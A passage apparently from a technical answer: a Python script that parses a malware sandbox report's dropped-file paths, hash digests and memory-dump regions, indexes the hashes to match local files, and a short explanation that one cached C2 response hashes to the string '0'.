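"""
import hashlib
import re
from dataclasses import dataclass, field
from pathlib import Path
from typing import Dict, List, Optional, Tuple

# One Windows path line starts a new dropped-file record.
PATH_LINE = re.compile(r"^[A-Za-z]:\\")
HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
MEM_LINE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}


@dataclass
class DroppedFile:
    path: str
    hashes: Dict[str, str] = field(default_factory=dict)


@dataclass
class MemoryRegion:
    pid: int
    seq: int
    start: int
    end: int

    @property
    def size(self) -> int:
        return self.end - self.start


def parse_files_section(text: str) -> Tuple[List[DroppedFile], List[MemoryRegion]]:
    """Parse the report layout: path, its digest lines, memory-dump lines."""
    files: List[DroppedFile] = []
    regions: List[MemoryRegion] = []
    current: Optional[DroppedFile] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEM_LINE.match(line)
        if m:
            regions.append(MemoryRegion(int(m["pid"]), int(m["seq"]),
                                        int(m["start"], 16), int(m["end"], 16)))
            continue
        m = HASH_LINE.match(line)
        if m:
            algo, digest = m.group(1), m.group(2).lower()
            if current is None or len(digest) != HASH_LEN[algo]:
                raise ValueError(f"malformed hash line: {line}")
            current.hashes[algo] = digest
            continue
        if PATH_LINE.match(line):
            current = DroppedFile(path=line)
            files.append(current)
        # Anything else (section headers, stray text) is ignored.
    return files, regions


def build_hash_index(files: List[DroppedFile]) -> Dict[str, Dict[str, str]]:
    """algo -> digest -> report path, for O(1) lookups."""
    index: Dict[str, Dict[str, str]] = {}
    for f in files:
        for algo, digest in f.hashes.items():
            index.setdefault(algo, {})[digest] = f.path
    return index


def match_bytes(data: bytes, index: Dict[str, Dict[str, str]]) -> Optional[Tuple[str, str]]:
    """Return (algorithm, report path) for the first hit, strongest hash first.

    An MD5- or SHA1-only hit means the report entry lacked a stronger digest
    or you are looking at a collision; treat such hits as leads, not proof.
    """
    for algo, fn in (("SHA256", hashlib.sha256), ("SHA1", hashlib.sha1), ("MD5", hashlib.md5)):
        hit = index.get(algo, {}).get(fn(data).hexdigest())
        if hit is not None:
            return algo, hit
    return None


def match_file(path: Path, index: Dict[str, Dict[str, str]]) -> Optional[Tuple[str, str]]:
    """Hash a local file and look it up in the report index."""
    return match_bytes(path.read_bytes(), index)


def regions_by_pid(regions: List[MemoryRegion]) -> Dict[int, List[MemoryRegion]]:
    """Group dumped regions per process so injected/unpacked PIDs stand out."""
    out: Dict[int, List[MemoryRegion]] = {}
    for r in regions:
        out.setdefault(r.pid, []).append(r)
    return out


# Copied from the report's Files section above.
REPORT_EXCERPT = r"""
C:\Users\Admin\AppData\Local\Temp\jfXTS3uY9.hta

MD5 4e701582cd99c1553aa60dccfd9d98dd
SHA1 30bdcc5da83588b5607a8e44300e26d61a9e4d94
SHA256 ef0c98f3a26c461d88247989f55403d5837a8569893338df2f0d9fa442b3053d
SHA512 de9512e80a396223824eabb06839a486f6009c1f676a07b7669d2fe91ff6c4e00f98e0fc7b34d97ee63964ad9aab8a1d258173ce3ecb714feb981082c40c8880

memory/3420-2-0x00000000022F0000-0x0000000002326000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\IPTE5OF1\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

memory/984-48-0x0000000000BA0000-0x0000000001062000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

MD5 06f2bf604094d7a50950c63a42472d7b
SHA1 4001209cfe41b43f6b1e0940b41fada952a3883c
SHA256 7da60962ee6d1a9e1ac49c968f645d6ed74ef379c2df1144ee61d92bccd71a01
SHA512 f157e3dba866a23846c5d31fb75ddea909fd497e37663f17bf4fcc6c70ff94316fcdf98c300ffa639ae355c9de3d9e2fc7706d1cbdd22c53fe0b42db1f02e4db
"""

if __name__ == "__main__":
    files, regions = parse_files_section(REPORT_EXCERPT)
    index = build_hash_index(files)
    for pid, regs in regions_by_pid(regions).items():
        print(pid, [hex(r.size) for r in regs])
    # The cached C2 response body hashes to the single byte "0".
    print(match_bytes(b"0", index))
```

One thing the index makes visible at once: the MD5, SHA1 and SHA256 recorded for `INetCache\IE\IPTE5OF1\service[1].htm` are the well-known digests of the one-byte string `0`, so the cached response body in this run was simply `0`. The MD5 and SHA1 columns are worth keeping for correlation with older feeds, but a blocking decision should rest on the SHA256 hit, which is why `match_bytes` reports which algorithm matched.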